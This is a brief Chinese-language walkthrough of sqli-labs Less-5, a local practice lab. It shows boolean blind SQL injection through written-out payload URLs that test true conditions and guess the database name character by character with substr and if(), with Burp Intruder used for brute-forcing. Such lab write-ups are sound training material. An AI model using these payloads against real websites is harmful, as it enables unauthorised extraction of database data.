Less-5【报错+BOOL类型】

使用单双引号进行测试，发现单引号可以闭合语句，但是进行脱库操作发现无回显，尝试Bool类型注入

http://127.0.0.1/sqli-labs-master/Less-5/?id=2%27%20and%201=1--+

• 单字符爆破

利用substr函数进行单个字符尝试

http://127.0.0.1/sqli-labs-master/Less-5/?id=2%27%20and%20substr(database(),1,1)=%27a%27--+

成功画面

失败画面

结合Burpsuite的Intruder模块进行爆破

后续的操作都类似

• 整体爆破

利用if（条件，1，0）进行测试

http://127.0.0.1/sqli-labs-master/Less-5/?id=2%27%20and%201=if((database()=%27security%27),1,0)--+